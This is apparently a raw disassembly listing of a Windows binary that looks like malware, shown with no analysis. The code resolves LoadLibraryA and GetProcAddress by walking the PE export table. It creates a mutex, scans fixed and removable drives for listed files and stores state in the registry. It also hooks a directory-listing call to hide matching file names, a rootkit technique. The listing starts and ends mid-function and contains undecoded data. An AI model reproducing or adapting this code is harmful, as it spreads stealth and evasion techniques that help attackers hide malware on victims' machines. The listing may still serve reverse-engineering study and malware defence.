loc_414E0F: ; CODE XREF: sub_414C49+13D�j
; sub_414C49+157�j ...
push [ebp+var_8]
call sub_41A83D
cmp [ebp+var_1], bl
pop ecx
jnz short loc_414E74
lea eax, [ebp+var_8]
push eax
push 3FAh
call sub_414B1B
test eax, eax
pop ecx
pop ecx
jz short loc_414E3A
push [ebp+var_8]
call sub_41A83D
pop ecx
loc_414E3A: ; CODE XREF: sub_414C49+1E6�j
lea eax, [ebp+var_8]
push eax
push 3F1h
call sub_414B1B
cmp eax, ebx
pop ecx
pop ecx
jz short loc_414E6F
push eax
push [ebp+var_8]
call sub_41A1D4
test al, al
pop ecx
pop ecx
jz short loc_414E66
push [ebp+var_8]
call sub_41735E
pop ecx
loc_414E66: ; CODE XREF: sub_414C49+212�j
push [ebp+var_8]
call sub_41A83D
pop ecx
loc_414E6F: ; CODE XREF: sub_414C49+203�j
call sub_414AD3
loc_414E74: ; CODE XREF: sub_414C49+1D2�j
xor eax, eax
inc eax
jmp loc_414CB6
sub_414C49 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push offset dword_40F7D8
call dword_40FE84 ; RtlEnterCriticalSection
mov esi, [ebp+8]
xor ebx, ebx
cmp esi, ebx
mov [ebp-1], bl
jz short loc_414EA3
mov [ebp-8], esi
jmp short loc_414EBD
; ---------------------------------------------------------------------------
loc_414EA3: ; CODE XREF: .data:00414E9C�j
lea eax, [ebp-8]
push eax
mov eax, dword_40FC1C
movzx ecx, byte ptr [eax+64h]
push ecx
add eax, 6Ch
push eax
call sub_41AF95
add esp, 0Ch
loc_414EBD: ; CODE XREF: .data:00414EA1�j
push dword_40F5C8
lea eax, [ebp-214h]
push eax
call dword_40FD98 ; lstrcpyW
mov eax, dword_40FB34
push dword ptr [eax+1Ch]
lea eax, [ebp-214h]
push eax
call dword_40FDA4 ; lstrcatW
cmp [ebp-8], ebx
jz short loc_414F34
push ebx
push 84043300h
push ebx
push ebx
push dword ptr [ebp-8]
push dword_40FABC
call dword_40FB44
cmp eax, ebx
jz short loc_414F34
xor ecx, ecx
cmp esi, ebx
setnz cl
push ecx
push dword_40F5C8
lea ecx, [ebp-214h]
push ecx
push eax
call sub_414C49
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_414F34
cmp eax, 1
setz byte ptr [ebp-1]
jmp loc_414FF9
; ---------------------------------------------------------------------------
loc_414F34: ; CODE XREF: .data:00414EE8�j
; .data:00414F03�j ...
cmp esi, ebx
jnz loc_414FF9
push edi
push ebx
xor edi, edi
push ebx
mov [ebp-0Ch], edi
call sub_414A0E
test al, al
pop ecx
pop ecx
jz short loc_414F81
lea eax, [ebp-0Ch]
push eax
push 3EBh
call sub_414B1B
cmp eax, ebx
mov edi, [ebp-0Ch]
pop ecx
pop ecx
jz short loc_414F7C
push eax
push edi
call sub_41A1D4
test al, al
pop ecx
pop ecx
jnz short loc_414F7C
push edi
call sub_41A83D
pop ecx
xor edi, edi
loc_414F7C: ; CODE XREF: .data:00414F64�j
; .data:00414F71�j
call sub_414AD3
loc_414F81: ; CODE XREF: .data:00414F4D�j
cmp edi, ebx
mov esi, edi
jz short loc_414FEE
cmp [edi], bl
jz short loc_414FEE
loc_414F8B: ; CODE XREF: .data:00414FE3�j
push 2710h
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_414FEE
push ebx
push 84043300h
push ebx
push ebx
push esi
push dword_40FABC
call dword_40FB44
cmp eax, ebx
jz short loc_414FD5
push ebx
push dword_40F5C8
lea ecx, [ebp-214h]
push ecx
push eax
call sub_414C49
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_414FE7
loc_414FD5: ; CODE XREF: .data:00414FB7�j
push 1
push esi
call sub_41A1FA
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_414F8B
jmp short loc_414FEE
; ---------------------------------------------------------------------------
loc_414FE7: ; CODE XREF: .data:00414FD3�j
cmp eax, 1
setz byte ptr [ebp-1]
loc_414FEE: ; CODE XREF: .data:00414F85�j
; .data:00414F89�j ...
push edi
call sub_41A83D
mov esi, [ebp+8]
pop ecx
pop edi
loc_414FF9: ; CODE XREF: .data:00414F2F�j
; .data:00414F36�j
push offset dword_40F7D8
call dword_40FE88 ; RtlLeaveCriticalSection
cmp esi, ebx
pop esi
pop ebx
jnz short loc_415013
push dword ptr [ebp-8]
call sub_41A83D
pop ecx
loc_415013: ; CODE XREF: .data:00415008�j
mov al, [ebp-1]
leave
retn
; ---------------------------------------------------------------------------
dd 5DE8006Ah, 84FFFFFEh, 0FC1CA1C0h, 74590040h, 4C408B05h
dd 408B03EBh, 35FF5050h, 40FAB8h, 0FDB815FFh, 0C0850040h
dd 0DFFD675h, 40FAB4h
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
sub_41504B proc near ; CODE XREF: sub_419C1A:loc_419C68�p
call sub_4149C6
push offset dword_40F7D8
mov dword_40F5C8, eax
call dword_40FE80 ; InitializeCriticalSection
inc dword_40FAB4
push 0
push offset sub_403AF2
call sub_41B789
pop ecx
pop ecx
retn
sub_41504B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415075 proc near ; CODE XREF: sub_4151EE+12D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 1
push ebx
push ebx
push ebx
push dword ptr [eax+1A0h]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_4150DA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_C], 4
push [ebp+var_8]
mov [ebp+var_4], ebx
call dword_40FBDC
test eax, eax
jnz short loc_4150D1
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_4]
jnz short loc_4150D1
mov bl, 1
loc_4150D1: ; CODE XREF: sub_415075+50�j
; sub_415075+58�j
push [ebp+var_8]
call dword_40FBE4
loc_4150DA: ; CODE XREF: sub_415075+2C�j
mov al, bl
pop ebx
leave
retn
sub_415075 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4150DF proc near ; CODE XREF: sub_4151EE+194�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
push esi
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 2
push esi
push esi
push esi
push dword ptr [eax+1A0h]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_415129
push 4
lea eax, [ebp+arg_4]
push eax
push 4
push esi
push [ebp+arg_0]
push [ebp+var_4]
call dword_40FBE8
push [ebp+var_4]
call dword_40FBE4
loc_415129: ; CODE XREF: sub_4150DF+2A�j
pop esi
leave
retn
sub_4150DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41512C proc near ; CODE XREF: sub_41549E:loc_415538�p
; sub_41555A:loc_41564B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push offset dword_40F7F8
mov [ebp+var_4], esi
call dword_40FE84 ; RtlEnterCriticalSection
xor eax, eax
cmp dword_40F810, esi
mov [ebp+var_C], eax
jbe short loc_4151C7
push ebx
push edi
loc_415152: ; CODE XREF: sub_41512C+97�j
mov ecx, dword_40F814
lea eax, [ecx+eax*4]
cmp dword ptr [eax], 0
jz short loc_4151B6
push 0FFFFFFFFh
push dword ptr [eax]
call sub_41BC1D
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jz short loc_4151B6
push eax
call dword_40FD94 ; lstrlenA
mov ebx, eax
lea edi, [ebx+esi]
lea eax, [edi+1]
push eax
lea eax, [ebp+var_4]
push eax
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_4151AD
mov eax, [ebp+var_4]
push ebx
push [ebp+var_8]
add esi, eax
push esi
call sub_41A857
mov eax, [ebp+var_4]
mov esi, edi
add esp, 0Ch
mov byte ptr [esi+eax], 20h
inc esi
loc_4151AD: ; CODE XREF: sub_41512C+63�j
push [ebp+var_8]
call sub_41A83D
pop ecx
loc_4151B6: ; CODE XREF: sub_41512C+32�j
; sub_41512C+44�j
mov eax, [ebp+var_C]
inc eax
cmp eax, dword_40F810
mov [ebp+var_C], eax
jb short loc_415152
pop edi
pop ebx
loc_4151C7: ; CODE XREF: sub_41512C+22�j
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push esi
push [ebp+var_4]
push offset dword_401028
call sub_41B9E9
push [ebp+var_4]
call sub_41A83D
add esp, 10h
pop esi
leave
retn
sub_41512C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4151EE proc near ; CODE XREF: sub_4151EE+C1�p
; .data:00415467�p
var_664 = byte ptr -664h
var_45C = byte ptr -45Ch
var_256 = word ptr -256h
var_254 = byte ptr -254h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_228 = word ptr -228h
var_226 = word ptr -226h
var_224 = word ptr -224h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 664h
push ebx
push offset dword_40103C
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_45C]
xor ebx, ebx
push eax
mov [ebp+var_256], bx
call dword_40FE94 ; FindFirstFileW
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_415239
xor al, al
jmp loc_4153DA
; ---------------------------------------------------------------------------
loc_415239: ; CODE XREF: sub_4151EE+42�j
push esi
push edi
mov edi, offset dword_40F7F8
loc_415240: ; CODE XREF: sub_4151EE+1D9�j
cmp [ebp+var_228], 2Eh
jnz short loc_41526E
cmp [ebp+var_226], bx
jz loc_4153AD
cmp [ebp+var_226], 2Eh
jnz short loc_41526E
cmp [ebp+var_224], bx
jz loc_4153AD
loc_41526E: ; CODE XREF: sub_4151EE+5A�j
; sub_4151EE+71�j
test [ebp+var_254], 10h
jz short loc_4152BB
lea eax, [ebp+var_228]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
mov esi, [ebp+arg_4]
push 3E8h
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_4153CD
lea eax, [ebp+var_45C]
push esi
push eax
call sub_4151EE
pop ecx
pop ecx
jmp loc_4153AD
; ---------------------------------------------------------------------------
loc_4152BB: ; CODE XREF: sub_4151EE+87�j
push edi
call dword_40FE84 ; RtlEnterCriticalSection
xor esi, esi
cmp dword_40F810, ebx
jbe loc_41539E
loc_4152D0: ; CODE XREF: sub_4151EE+13F�j
mov eax, dword_40F814
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_415326
cmp [ebp+var_238], ebx
jnz short loc_415326
push dword ptr [eax]
lea eax, [ebp+var_228]
push eax
call dword_40FC9C
test eax, eax
jz short loc_415326
lea eax, [ebp+var_228]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_45C]
push eax
call dword_40FC8C
push [ebp+var_234]
lea eax, [ebp+var_45C]
push eax
call sub_415075
test al, al
pop ecx
pop ecx
jz short loc_415331
loc_415326: ; CODE XREF: sub_4151EE+EC�j
; sub_4151EE+F4�j ...
inc esi
cmp esi, dword_40F810
jb short loc_4152D0
jmp short loc_41539E
; ---------------------------------------------------------------------------
loc_415331: ; CODE XREF: sub_4151EE+136�j
lea eax, [ebp+var_228]
push eax
push [ebp+var_234]
mov eax, dword_40FB34
push dword ptr [eax+1A4h]
lea eax, [ebp+var_664]
push 103h
push eax
call dword_40FC84
lea eax, [ebp+var_664]
push eax
lea eax, [ebp+var_45C]
push eax
call sub_41CFA9
add esp, 1Ch
test al, al
jz short loc_415389
push [ebp+var_234]
lea eax, [ebp+var_45C]
push eax
call sub_4150DF
pop ecx
pop ecx
loc_415389: ; CODE XREF: sub_4151EE+185�j
mov eax, [ebp+arg_4]
push 2710h
push dword ptr [eax+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_4153CD
loc_41539E: ; CODE XREF: sub_4151EE+DC�j
; sub_4151EE+141�j
push edi
call dword_40FE88 ; RtlLeaveCriticalSection
push 14h
call dword_40FD68 ; Sleep
loc_4153AD: ; CODE XREF: sub_4151EE+63�j
; sub_4151EE+7A�j ...
cmp dword_40F810, ebx
jbe short loc_4153CD
lea eax, [ebp+var_254]
push eax
push [ebp+var_4]
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz loc_415240
loc_4153CD: ; CODE XREF: sub_4151EE+B3�j
; sub_4151EE+1AE�j ...
push [ebp+var_4]
call dword_40FE9C ; FindClose
pop edi
mov al, 1
pop esi
loc_4153DA: ; CODE XREF: sub_4151EE+46�j
pop ebx
leave
retn
sub_4151EE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0FFFFFFF1h
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
mov esi, [ebp+8]
mov edi, 2710h
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_415496
push ebx
loc_41540F: ; CODE XREF: .data:0041548F�j
cmp dword_40F810, 0
jz short loc_415483
call dword_40FD38 ; GetLogicalDrives
mov [ebp+8], eax
mov bl, 2
loc_415423: ; CODE XREF: .data:00415481�j
xor eax, eax
inc eax
mov cl, bl
shl eax, cl
mov ecx, [ebp+8]
test eax, ecx
jz short loc_41547C
and word ptr [ebp-0Ah], 0
movzx ax, bl
add ax, 41h
mov [ebp-10h], ax
lea eax, [ebp-10h]
push eax
mov word ptr [ebp-0Eh], 3Ah
mov word ptr [ebp-0Ch], 5Ch
call dword_40FD3C ; GetDriveTypeW
cmp eax, 3
jz short loc_415462
cmp eax, 2
jnz short loc_41547C
loc_415462: ; CODE XREF: .data:0041545B�j
lea eax, [ebp-10h]
push esi
push eax
call sub_4151EE
pop ecx
pop ecx
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_415495
loc_41547C: ; CODE XREF: .data:0041542F�j
; .data:00415460�j
inc bl
cmp bl, 20h
jb short loc_415423
loc_415483: ; CODE XREF: .data:00415416�j
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_41540F
loc_415495: ; CODE XREF: .data:0041547A�j
pop ebx
loc_415496: ; CODE XREF: .data:00415408�j
dec dword ptr [esi]
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41549E proc near ; CODE XREF: sub_415655+3F�p
; .data:0041853C�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_4]
push ebx
push edi
push 64h
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
add ecx, eax
push ecx
push eax
mov [ebp+var_1], 0
mov [ebp+var_8], ebx
call sub_41C757
mov edi, eax
add esp, 14h
cmp edi, ebx
jz loc_415553
push offset dword_40F7F8
call dword_40FE84 ; RtlEnterCriticalSection
mov eax, dword_40F810
add eax, edi
shl eax, 2
push eax
push offset dword_40F814
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_415538
cmp edi, ebx
jbe short loc_415538
push esi
loc_4154FC: ; CODE XREF: sub_41549E+97�j
mov eax, [ebp+var_8]
mov esi, dword_40F810
push 0FFFFFFFFh
push dword ptr [eax+ebx*4]
shl esi, 2
call sub_41BCB7
pop ecx
pop ecx
mov ecx, dword_40F814
mov [esi+ecx], eax
mov eax, dword_40F814
cmp dword ptr [esi+eax], 0
jz short loc_415532
inc dword_40F810
mov [ebp+var_1], 1
loc_415532: ; CODE XREF: sub_41549E+88�j
inc ebx
cmp ebx, edi
jb short loc_4154FC
pop esi
loc_415538: ; CODE XREF: sub_41549E+57�j
; sub_41549E+5B�j
call sub_41512C
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push edi
push [ebp+var_8]
call sub_41A8D2
pop ecx
pop ecx
loc_415553: ; CODE XREF: sub_41549E+2D�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_41549E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41555A proc near ; CODE XREF: .data:loc_418543�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_4]
push edi
push 64h
xor edi, edi
push edi
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_0]
add ecx, eax
push ecx
push eax
mov [ebp+var_4], edi
call sub_41C757
add esp, 14h
cmp eax, edi
mov [ebp+arg_0], eax
jz loc_41564B
push ebx
push offset dword_40F7F8
call dword_40FE84 ; RtlEnterCriticalSection
xor ebx, ebx
cmp [ebp+arg_0], edi
jbe short loc_415606
push esi
loc_41559C: ; CODE XREF: sub_41555A+A9�j
mov eax, [ebp+var_4]
push 0FFFFFFFFh
push dword ptr [eax+ebx*4]
call sub_41BCB7
cmp eax, edi
pop ecx
pop ecx
mov [ebp+arg_4], eax
jz short loc_4155FF
xor esi, esi
cmp dword_40F810, edi
jbe short loc_4155F6
loc_4155BC: ; CODE XREF: sub_41555A+9A�j
mov eax, dword_40F814
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_4155ED
push [ebp+arg_4]
push dword ptr [eax]
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz short loc_4155ED
mov eax, dword_40F814
push dword ptr [eax+esi*4]
call sub_41A83D
mov eax, dword_40F814
pop ecx
mov [eax+esi*4], edi
loc_4155ED: ; CODE XREF: sub_41555A+6C�j
; sub_41555A+7B�j
inc esi
cmp esi, dword_40F810
jb short loc_4155BC
loc_4155F6: ; CODE XREF: sub_41555A+60�j
push [ebp+arg_4]
call sub_41A83D
pop ecx
loc_4155FF: ; CODE XREF: sub_41555A+56�j
inc ebx
cmp ebx, [ebp+arg_0]
jb short loc_41559C
pop esi
loc_415606: ; CODE XREF: sub_41555A+3F�j
mov eax, dword_40F810
mov ecx, dword_40F814
xor edx, edx
cmp eax, edi
pop ebx
jbe short loc_415622
loc_415618: ; CODE XREF: sub_41555A+C6�j
cmp [ecx+edx*4], edi
jnz short loc_415622
inc edx
cmp edx, eax
jb short loc_415618
loc_415622: ; CODE XREF: sub_41555A+BC�j
; sub_41555A+C1�j
cmp edx, eax
jnz short loc_415633
push ecx
mov dword_40F810, edi
call sub_41A83D
pop ecx
loc_415633: ; CODE XREF: sub_41555A+CA�j
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push [ebp+arg_0]
push [ebp+var_4]
call sub_41A8D2
pop ecx
pop ecx
loc_41564B: ; CODE XREF: sub_41555A+28�j
call sub_41512C
xor al, al
pop edi
leave
retn
sub_41555A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415655 proc near ; CODE XREF: sub_419C1A+B5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push offset dword_40F7F8
call dword_40FE80 ; InitializeCriticalSection
mov esi, [ebp+arg_0]
inc dword ptr [esi]
lea eax, [ebp+var_4]
xor edi, edi
push eax
push offset dword_401028
mov dword_40F814, edi
mov dword_40F810, edi
mov [ebp+var_4], edi
call sub_41B99C
cmp eax, edi
pop ecx
pop ecx
jz short loc_4156A4
push eax
push [ebp+var_4]
call sub_41549E
push [ebp+var_4]
call sub_41A83D
add esp, 0Ch
loc_4156A4: ; CODE XREF: sub_415655+39�j
push edi
push edi
push esi
push offset sub_403EB7
push edi
push edi
call dword_40FE10 ; CreateThread
cmp eax, edi
jz short loc_4156C3
push eax
call dword_40FDAC ; CloseHandle
mov al, 1
jmp short loc_4156C7
; ---------------------------------------------------------------------------
loc_4156C3: ; CODE XREF: sub_415655+61�j
dec dword ptr [esi]
xor al, al
loc_4156C7: ; CODE XREF: sub_415655+6C�j
pop edi
pop esi
leave
retn
sub_415655 endp
; =============== S U B R O U T I N E =======================================
sub_4156CB proc near ; CODE XREF: .data:00415769�p
mov eax, edx
and eax, 0FFFF0000h
jz short loc_4156FC
loc_4156D4: ; CODE XREF: sub_4156CB+2F�j
cmp word ptr [eax], 5A4Dh
jnz short loc_4156F5
mov ecx, [eax+3Ch]
add ecx, eax
cmp ecx, edx
ja short loc_4156F5
cmp dword ptr [ecx], 4550h
jnz short loc_4156F5
mov ecx, [ecx+50h]
add ecx, eax
cmp ecx, edx
ja short locret_4156FE
loc_4156F5: ; CODE XREF: sub_4156CB+E�j
; sub_4156CB+17�j ...
sub eax, 10000h
jnz short loc_4156D4
loc_4156FC: ; CODE XREF: sub_4156CB+7�j
xor eax, eax
locret_4156FE: ; CODE XREF: sub_4156CB+28�j
retn
sub_4156CB endp
; =============== S U B R O U T I N E =======================================
sub_4156FF proc near ; CODE XREF: .data:00415778�p
; .data:0041578C�p
arg_0 = dword ptr 4
mov eax, [edi+3Ch]
push ebx
push esi
mov esi, [eax+edi+78h]
add esi, edi
xor ebx, ebx
cmp [esi+18h], ebx
jbe short loc_415736
loc_415711: ; CODE XREF: sub_4156FF+35�j
lea eax, [edi+ebx*4]
add eax, [esi+20h]
push 0FFFFFFFFh
mov eax, [eax]
push 0FFFFFFFFh
add eax, edi
push eax
push [esp+14h+arg_0]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41573B
inc ebx
cmp ebx, [esi+18h]
jb short loc_415711
loc_415736: ; CODE XREF: sub_4156FF+10�j
xor eax, eax
loc_415738: ; CODE XREF: sub_4156FF+47�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41573B: ; CODE XREF: sub_4156FF+2F�j
mov eax, [esi+1Ch]
lea eax, [eax+ebx*4]
mov eax, [eax+edi]
add eax, edi
jmp short loc_415738
sub_4156FF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20Ch
push edi
xor edx, edx
mov eax, fs:[edx]
dec edx
loc_415758: ; CODE XREF: .data:0041575E�j
cmp [eax], edx
jz short loc_415760
mov eax, [eax]
jmp short loc_415758
; ---------------------------------------------------------------------------
loc_415760: ; CODE XREF: .data:0041575A�j
mov eax, [eax+4]
mov [ebp-4], eax
mov edx, [ebp-4]
call sub_4156CB
mov edi, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov [ebp-4], edi
call sub_4156FF
mov edi, [ebp-4]
mov dword_40FD08, eax
mov dword ptr [esp], offset aGetprocaddress ; "GetProcAddress"
call sub_4156FF
push 7Eh
mov dword_40FD04, eax
call sub_41BFFA
test al, al
pop ecx
pop ecx
pop edi
jnz short loc_4157A6
leave
retn
; ---------------------------------------------------------------------------
loc_4157A6: ; CODE XREF: .data:004157A2�j
and dword_40F818, 0
push esi
lea eax, [ebp-20Ch]
push eax
push 2
push dword_40FCA4
push dword_40FB30
call sub_41B2B4
add esp, 10h
lea eax, [ebp-20Ch]
push eax
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
push 0
call sub_41C198
call sub_41C9C6
call sub_4149C6
call sub_41FB29
call sub_41DA3F
call sub_415DAE
mov dword ptr [esp], offset dword_40F81C
call dword_40FE80 ; InitializeCriticalSection
push 0FFFFFFFFh
mov esi, offset off_40F2C0
push esi
call sub_417F0B
push 0FFFFFFFFh
push esi
call sub_41835C
add esp, 10h
mov al, 1
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 0E9h, 1Ah, 0FFh
dd 15E8FFFFh, 84FFFFFFh, 330375C0h, 6AC3C0h, 0FD6415FFh
dd 81660040h, 755A4D38h, 3C488BEEh, 3981C803h, 4550h, 498BE175h
dd 0FFC80328h
db 0E1h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+24h]
mov eax, offset sub_404308
push dword ptr [ebp+20h]
sub eax, dword_40FCB0
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
push eax
call sub_41816A
add esp, 24h
pop ebp
retn 20h
; ---------------------------------------------------------------------------
dd 4244C8Bh, 0FBB00D3Bh, 548B0040h, 8740824h, 0FCB80D3Bh
dd 9750040h, 574D285h, 0EB04428Bh, 0FFC03302h, 0FF102474h
dd 52102474h, 0F2C06851h, 0E8500040h, 2961h, 0C218C483h
dd 74FF0010h, 3 dup(74FF1024h), 0C0681024h, 680040F2h
dd 40F81Ch, 298BE8h, 18C48300h
db 0C2h, 10h, 0
; =============== S U B R O U T I N E =======================================
sub_4158F3 proc near ; CODE XREF: .data:00415AA3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
shr [esp+arg_4], 1
push ebx
xor bl, bl
loc_4158FA: ; CODE XREF: sub_4158F3+3F�j
movzx eax, bl
movzx ecx, byte_40F065[eax]
cmp ecx, [esp+4+arg_4]
jnz short loc_41592C
push [esp+4+arg_4]
movzx eax, byte_40F064[eax]
mov ecx, dword_40FB34
push dword ptr [ecx+eax*4]
push [esp+0Ch+arg_0]
call dword_40FC78
test eax, eax
jz short loc_415938
loc_41592C: ; CODE XREF: sub_4158F3+15�j
add bl, 2
cmp bl, 4
jb short loc_4158FA
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_4158F3+37�j
mov al, 1
pop ebx
retn
sub_4158F3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 608h
push ebx
mov ebx, [ebp+24h]
push esi
push edi
push dword ptr [ebp+30h]
push dword ptr [ebp+2Ch]
push dword ptr [ebp+28h]
push ebx
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_40FC34
xor esi, esi
cmp eax, esi
mov [ebp+2Ch], eax
jnz loc_415AD4
cmp [ebp+1Ch], esi
jz loc_415AD4
cmp ebx, 1
jz short loc_41599E
cmp ebx, 2
jz short loc_41599E
cmp ebx, 3
jz short loc_41599E
cmp ebx, 0Ch
jnz loc_415AD4
loc_41599E: ; CODE XREF: .data:00415989�j
; .data:0041598E�j ...
lea eax, [ebp+28h]
push eax
push 400h
lea eax, [ebp-608h]
push eax
push 1
push dword ptr [ebp+8]
mov [ebp+28h], esi
call dword_40FC28
test eax, eax
jnz loc_415AD4
cmp dword_40F818, esi
movzx eax, word ptr [ebp-608h]
mov ecx, [ebp-604h]
mov [ecx+eax*2], si
jnz short loc_415A2D
lea eax, [ebp-208h]
push eax
call sub_41B208
lea eax, [ebp-208h]
push eax
call sub_41BD07
pop ecx
pop ecx
push 2
mov dword_40F818, eax
mov esi, offset byte_40F065
pop edi
loc_415A04: ; CODE XREF: .data:00415A1C�j
movzx eax, byte ptr [esi-1]
mov ecx, dword_40FB34
push dword ptr [ecx+eax*4]
call dword_40FD90 ; lstrlenW
mov [esi], al
inc esi
inc esi
dec edi
jnz short loc_415A04
cmp dword_40F818, 0
jz loc_415AD4
xor esi, esi
loc_415A2D: ; CODE XREF: .data:004159DB�j
push dword ptr [ebp-604h]
push dword_40F818
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz loc_415AD4
mov eax, ebx
dec eax
mov [ebp+30h], esi
mov [ebp+8], esi
jz short loc_415A7F
dec eax
jz short loc_415A76
dec eax
jz short loc_415A6D
sub eax, 9
jnz short loc_415A8D
mov dword ptr [ebp+30h], 0Ch
mov dword ptr [ebp+8], 8
jmp short loc_415A8D
; ---------------------------------------------------------------------------
loc_415A6D: ; CODE XREF: .data:00415A56�j
mov dword ptr [ebp+30h], 5Eh
jmp short loc_415A86
; ---------------------------------------------------------------------------
loc_415A76: ; CODE XREF: .data:00415A53�j
mov dword ptr [ebp+30h], 44h
jmp short loc_415A86
; ---------------------------------------------------------------------------
loc_415A7F: ; CODE XREF: .data:00415A50�j
mov dword ptr [ebp+30h], 40h
loc_415A86: ; CODE XREF: .data:00415A74�j
; .data:00415A7D�j
mov dword ptr [ebp+8], 3Ch
loc_415A8D: ; CODE XREF: .data:00415A5B�j
; .data:00415A6B�j
xor ebx, ebx
loc_415A8F: ; CODE XREF: .data:00415AC0�j
mov eax, [ebp+1Ch]
mov edi, esi
lea esi, [ebx+eax]
mov eax, [ebp+8]
push dword ptr [esi+eax]
mov eax, [ebp+30h]
add eax, esi
push eax
call sub_4158F3
test al, al
pop ecx
pop ecx
jz short loc_415ABA
mov eax, [esi]
test eax, eax
jz short loc_415AC4
test edi, edi
jz short loc_415ABA
add [edi], eax
loc_415ABA: ; CODE XREF: .data:00415AAC�j
; .data:00415AB6�j
mov eax, [esi]
add ebx, eax
test eax, eax
ja short loc_415A8F
jmp short loc_415AD4
; ---------------------------------------------------------------------------
loc_415AC4: ; CODE XREF: .data:00415AB2�j
test edi, edi
jz short loc_415ACD
and dword ptr [edi], 0
jmp short loc_415AD4
; ---------------------------------------------------------------------------
loc_415ACD: ; CODE XREF: .data:00415AC6�j
mov dword ptr [ebp+2Ch], 0C000000Fh
loc_415AD4: ; CODE XREF: .data:00415977�j
; .data:00415980�j ...
